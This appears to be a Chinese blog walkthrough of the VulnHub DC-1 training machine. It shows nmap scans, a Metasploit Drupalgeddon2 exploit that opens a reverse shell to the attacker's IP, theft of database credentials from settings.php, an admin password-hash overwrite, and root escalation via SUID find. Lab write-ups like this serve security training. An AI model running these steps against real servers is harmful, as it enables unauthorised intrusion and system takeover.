vulnhub靶机实战_DC-1
vulnhub靶机实战_DC-1
varin
发布于 2025-09-28 13:20:34
发布于 2025-09-28 13:20:34
代码可运行
运行总次数:0
代码可运行
启动
- 靶机下载地址:https://www.vulnhub.com/entry/dc-1,292/#download
- 启动过程:下载完成后,打开VMware虚拟机软件,文件》打开,导入下载的ova文件,将网络适配器改为:NAT模式
- 启动成功界面
image.png
扫描
- 渗透网段为192.168.29…0/24, 攻机ip为:10.196.93.128
- 使用namp 进行扫描
# sP 为Ping扫描
nmap -sP 192.168.29.0/24
image.png
- 发现靶机ip为:192.168.29.131
- 对靶机进行漏洞扫描
# -p 端口 -a 同时启用操作系统检测和版本检测。 -v 提高输出信息的详细程度 T4 扫描速度
nmap -p 1-65535 -A -v -T4 192.168.29.131
# 扫描结果:
tarting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-02 16:17 CST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 16:17
Completed NSE at 16:17, 0.00s elapsed
Initiating NSE at 16:17
Completed NSE at 16:17, 0.00s elapsed
Initiating NSE at 16:17
Completed NSE at 16:17, 0.00s elapsed
Initiating Ping Scan at 16:17
Scanning 192.168.29.131 [2 ports]
Completed Ping Scan at 16:17, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:17
Completed Parallel DNS resolution of 1 host. at 16:17, 0.01s elapsed
Initiating Connect Scan at 16:17
Scanning 192.168.29.131 [65535 ports]
Discovered open port 80/tcp on 192.168.29.131
Discovered open port 22/tcp on 192.168.29.131
Discovered open port 111/tcp on 192.168.29.131
Discovered open port 56415/tcp on 192.168.29.131
Completed Connect Scan at 16:17, 4.20s elapsed (65535 total ports)
Initiating Service scan at 16:17
Scanning 4 services on 192.168.29.131
Completed Service scan at 16:18, 11.36s elapsed (4 services on 1 host)
NSE: Script scanning 192.168.29.131.
Initiating NSE at 16:18
Completed NSE at 16:18, 4.12s elapsed
Initiating NSE at 16:18
Completed NSE at 16:18, 0.26s elapsed
Initiating NSE at 16:18
Completed NSE at 16:18, 0.01s elapsed
Nmap scan report for 192.168.29.131
Host is up (0.00074s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
| 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
| 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-generator: Drupal 7 (http://drupal.org)
|_http-favicon: Unknown favicon MD5: B6341DFC213100C61DB4FB8775878CEC
|_http-title: Welcome to Drupal Site | Drupal Site
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 44051/udp status
| 100024 1 47967/tcp6 status
| 100024 1 48142/udp6 status
|_ 100024 1 56415/tcp status
56415/tcp open status 1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
Initiating NSE at 16:18
Completed NSE at 16:18, 0.00s elapsed
Initiating NSE at 16:18
Completed NSE at 16:18, 0.00s elapsed
Initiating NSE at 16:18
Completed NSE at 16:18, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.47 seconds- 分析结果
- 开放端口:80 、22 、111、56415
- 80端口搭了一个Drupal web服务
攻击
- 访问网站:
http://192.168.29.131
image.png
- 使用SMF工具寻找Drupal服务漏洞
msfconsole # 进入工具
search drupal # 搜索
# 搜索结果
====================================================================================================
Matching Modules
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution
1 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
2 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection
3 auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection
4 exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution
5 exploit/unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE
6 auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration
7 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution
====================================================================================================
use 1 # 使用2018 进行攻击
set Rhost 192.168.29.131 # s设置靶机ip
set lhost 192.168.29.128 # 设置攻机ip
run # 开始攻击
# 攻击成功显示结果
====================================================================================================
[*] Started reverse TCP handler on 192.168.29.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Sending stage (39927 bytes) to 192.168.29.131
[*] Meterpreter session 1 opened (192.168.29.128:4444 -> 192.168.29.131:38928) at 2024-06-02 16:35:12 +0800
====================================================================================================- 进入靶机
help # 查看可操作项
shell # 进入靶机shell
# 使用python 反弹shell
python -c "import pty;pty.spawn('/bin/bash');"
whoami # 当前用户为 www-data
cd /home # 进入home后发现存在 flag4文件夹中的flag4.txt文件
cat /home/flag4/flag4.txt # 提示没有权限
# Can you use this same method to find or access the flag in root?
# Probably. But perhaps it's not that easy. Or maybe it is?
# 分析:靶机上只有一个web服务,去到它的根目录上看看有没有什么东西
# 由于Drupal 框架搭建在Apache上,得知 /var/www是网站默认的根目录
cd /var/www
ls -l
====================================================================================================
www-data@DC-1:/var/www$ ls -l
ls -l
total 168
-rw-r--r-- 1 www-data www-data 1481 Nov 21 2013 COPYRIGHT.txt
-rw-r--r-- 1 www-data www-data 1451 Nov 21 2013 INSTALL.mysql.txt
-rw-r--r-- 1 www-data www-data 1874 Nov 21 2013 INSTALL.pgsql.txt
-rw-r--r-- 1 www-data www-data 1298 Nov 21 2013 INSTALL.sqlite.txt
-rw-r--r-- 1 www-data www-data 17861 Nov 21 2013 INSTALL.txt
-rwxr-xr-x 1 www-data www-data 18092 Nov 1 2013 LICENSE.txt
-rw-r--r-- 1 www-data www-data 8191 Nov 21 2013 MAINTAINERS.txt
-rw-r--r-- 1 www-data www-data 5376 Nov 21 2013 README.txt
-rw-r--r-- 1 www-data www-data 9642 Nov 21 2013 UPGRADE.txt
-rw-r--r-- 1 www-data www-data 6604 Nov 21 2013 authorize.php
-rw-r--r-- 1 www-data www-data 720 Nov 21 2013 cron.php
-rw-r--r-- 1 www-data www-data 52 Feb 19 2019 flag1.txt
drwxr-xr-x 4 www-data www-data 4096 Nov 21 2013 includes
-rw-r--r-- 1 www-data www-data 529 Nov 21 2013 index.php
-rw-r--r-- 1 www-data www-data 703 Nov 21 2013 install.php
drwxr-xr-x 4 www-data www-data 4096 Nov 21 2013 misc
drwxr-xr-x 42 www-data www-data 4096 Nov 21 2013 modules
drwxr-xr-x 5 www-data www-data 4096 Nov 21 2013 profiles
-rw-r--r-- 1 www-data www-data 1561 Nov 21 2013 robots.txt
drwxr-xr-x 2 www-data www-data 4096 Nov 21 2013 scripts
drwxr-xr-x 4 www-data www-data 4096 Nov 21 2013 sites
drwxr-xr-x 7 www-data www-data 4096 Nov 21 2013 themes
-rw-r--r-- 1 www-data www-data 19941 Nov 21 2013 update.php
-rw-r--r-- 1 www-data www-data 2178 Nov 21 2013 web.config
-rw-r--r-- 1 www-data www-data 417 Nov 21 2013 xmlrpc.php
www-data@DC-1:/var/www$
====================================================================================================
# 发现 flag1.txt
cat flag1.txt
# Every good CMS needs a config file - and so do you. (大概意思为看看配置文件)
#配置文件路径:cd /var/sites/default
cd /sites/default
cat settings.php # 查看后,发现flag2 ,发现数据库 提示暴力破解或提升权限。
====================================================================================================
/**
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);- 进入数据库
mysql -u dbuser -p drupaldb
show databases;
# 显示mysql中所有的数据库
# ====================================================================================================
# +--------------------+
# | Database |
# +--------------------+
# | information_schema |
# | drupaldb |
# +--------------------+
# 2 rows in set (0.00 sec)
# ====================================================================================================
use drupaldb
show tables;
# 显示 drupaldb数据库中所有的表
# ====================================================================================================
# +-----------------------------+
# | Tables_in_drupaldb |
# +-----------------------------+
# | actions |
# | authmap |
# | batch |
# | block |
# | block_custom |
# | block_node_type |
# | block_role |
# | blocked_ips |
# | cache |
# | cache_block |
# | cache_bootstrap |
# | cache_field |
# | cache_filter |
# | cache_form |
# | cache_image |
# | cache_menu |
# | cache_page |
# | cache_path |
# | cache_update |
# | cache_views |
# | cache_views_data |
# | comment |
# | ctools_css_cache |
# | ctools_object_cache |
# | date_format_locale |
# | date_format_type |
# | date_formats |
# | field_config |
# | field_config_instance |
# | field_data_body |
# | field_data_comment_body |
# | field_data_field_image |
# | field_data_field_tags |
# | field_revision_body |
# | field_revision_comment_body |
# | field_revision_field_image |
# | field_revision_field_tags |
# | file_managed |
# | file_usage |
# | filter |
# | filter_format |
# | flood |
# | history |
# | image_effects |
# | image_styles |
# | menu_custom |
# | menu_links |
# | menu_router |
# | node |
# | node_access |
# | node_comment_statistics |
# | node_revision |
# | node_type |
# | queue |
# | rdf_mapping |
# | registry |
# | registry_file |
# | role |
# | role_permission |
# | search_dataset |
# | search_index |
# | search_node_links |
# | search_total |
# | semaphore |
# | sequences |
# | sessions |
# | shortcut_set |
# | shortcut_set_users |
# | system |
# | taxonomy_index |
# | taxonomy_term_data |
# | taxonomy_term_hierarchy |
# | taxonomy_vocabulary |
# | url_alias |
# | users |
# | users_roles |
# | variable |
# | views_display |
# | views_view |
# | watchdog |
# +-----------------------------+
# 80 rows in set (0.00 sec)
# ====================================================================================================
select name ,pass from users;
# ====================================================================================================
# +-------+---------------------------------------------------------+
# | name | pass |
# +-------+---------------------------------------------------------+
# | | |
# | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR |
# | Fred | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg |
# +-------+---------------------------------------------------------+
# 3 rows in set (0.00 sec)
# ====================================================================================================
#
参考链接:https://blog.csdn.net/weixin_33345090/article/details/113563493
根据查询得知,drupal5和6版本是通过MD5进行密码加密的,而drupal7则采用新型Hash方式的进行密码加密,显然靶机数据库的密码不是MD5加密方式加密。
而在Drupal 7的安装目录中的scripts目录下,有一些Drupal7开发者准备好的PHP脚本
password-hash.sh 就是进行密码加密的脚本。
注意:在使用脚本时,不要直接进入到scripts目录中,会报错。
php ./scripts/password-hash.sh '123456'>a.txt
cat a.txt
password: 123456 hash: $S$DOUZtHmiwRkJCsB1s3uvwHURm6GhWXWHMc2hcLXe1h.TzuvNIy2r
# 将新生成的密码替换admin密码
update users set pass = "$S$DOUZtHmiwRkJCsB1s3uvwHURm6GhWXWHMc2hcLXe1h.TzuvNIy2r" where name = 'admin';- flag3
image.png
点击flag3后,显示页面:
image.png
关键词:perms、find、passwd、-exec
cat /etc/passwd # 查看用户信息
# root:x:0:0:root:/root:/bin/bash
# daemon:x:1:1:daemon:/usr/sbin:/bin/sh
# bin:x:2:2:bin:/bin:/bin/sh
# sys:x:3:3:sys:/dev:/bin/sh
# sync:x:4:65534:sync:/bin:/bin/sync
# games:x:5:60:games:/usr/games:/bin/sh
# man:x:6:12:man:/var/cache/man:/bin/sh
# lp:x:7:7:lp:/var/spool/lpd:/bin/sh
# mail:x:8:8:mail:/var/mail:/bin/sh
# news:x:9:9:news:/var/spool/news:/bin/sh
# uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
# proxy:x:13:13:proxy:/bin:/bin/sh
# www-data:x:33:33:www-data:/var/www:/bin/sh
# backup:x:34:34:backup:/var/backups:/bin/sh
# list:x:38:38:Mailing List Manager:/var/list:/bin/sh
# irc:x:39:39:ircd:/var/run/ircd:/bin/sh
# gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
# nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
# libuuid:x:100:101::/var/lib/libuuid:/bin/sh
# Debian-exim:x:101:104::/var/spool/exim4:/bin/false
# statd:x:102:65534::/var/lib/nfs:/bin/false
# messagebus:x:103:107::/var/run/dbus:/bin/false
# sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
# mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false
# flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash
发现flag4 和最开始发现的位置一致,在home目录中,而打开flag4.txt文件,需要提升到root权限。- 提权
参考链接:https://blog.csdn.net/weixin_44912169/article/details/105845909
参考链接:https://blog.csdn.net/aobian2884/article/details/101404466?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522171733441116800186510085%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=171733441116800186510085&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-101404466-null-null.nonecase&utm_term=21&spm=1018.2226.3001.4450
参考链接:https://zhuanlan.zhihu.com/p/571759462?utm_id=0
#-exec 参数后面跟的是command命令,它的终止是以;为结束标志的,所以这句命令后面的分号是不可缺少的,考虑到各个系统中分号会有不同的意义,所以前面加反斜杠
# 寻找具有SUID权限的可执行文件
find / -perm -4000
# www-data@DC-1:/$ find / -perm -4000
# find / -perm -4000
# /bin/mount
# /bin/ping
# /bin/su
# /bin/ping6
# /bin/umount
# /usr/bin/at
# /usr/bin/chsh
# /usr/bin/passwd
# /usr/bin/newgrp
# /usr/bin/chfn
# /usr/bin/gpasswd
# /usr/bin/procmail
# /usr/bin/find
# /usr/sbin/exim4
# /usr/lib/pt_chown
# /usr/lib/openssh/ssh-keysign
# /usr/lib/eject/dmcrypt-get-device
# /usr/lib/dbus-1.0/dbus-daemon-launch-helper
# /sbin/mount.nfs
# find: `/proc/3396/task/3396/ns/net': No such file or directory
# find: `/proc/3396/task/3396/ns/uts': No such file or directory
# find: `/proc/3396/task/3396/ns/ipc': No such file or directory
# find: `/proc/3396/ns/net': No such file or directory
# find: `/proc/3396/ns/uts': No such file or directory
# find: `/proc/3396/ns/ipc': No such file or directory
# find: `/proc/3424/task/3424/ns/net': No such file or directory
# find: `/proc/3424/task/3424/ns/uts': No such file or directory
# find: `/proc/3424/task/3424/ns/ipc': No such file or directory
# find: `/proc/3424/ns/net': No such file or directory
# find: `/proc/3424/ns/uts': No such file or directory
# find: `/proc/3424/ns/ipc': No such file or directory
# find: `/proc/3641/task/3641/ns/net': No such file or directory
# find: `/proc/3641/task/3641/ns/uts': No such file or directory
# find: `/proc/3641/task/3641/ns/ipc': No such file or directory
# find: `/proc/3641/ns/net': No such file or directory
# find: `/proc/3641/ns/uts': No such file or directory
# find: `/proc/3641/ns/ipc': No such file or directory
# find: `/proc/4233/task/4233/fd/6': No such file or directory
# find: `/proc/4233/task/4233/fdinfo/6': No such file or directory
# find: `/proc/4233/fd/6': No such file or directory
# find: `/proc/4233/fdinfo/6': No such file or directory
可以发现find就具有权限,使用-exec参数提权
# /bin/sh ==等价于== /bin/bash --posix #开启便携模式,遇到错误时,停止继续运行
ww-data@DC-1:/home/flag4$ find flag4.txt -exec '/bin/sh' \;
find flag4.txt -exec '/bin/sh' \;
# whoami
whoami
root
# - flag5
# 寻找flag文件
find / -name '*flag.txt'
# 结果:
# /root/thefinalflag.txt
cat /root/thefinalflag.txt
# 结果:
# Well done!!!!
# Hopefully you've enjoyed this and learned some new skills.
# You can let me know what you thought of this little journey
# by contacting me via Twitter - @DCAU7
# # 结束。
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2024-06-05,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
腾讯云开发者
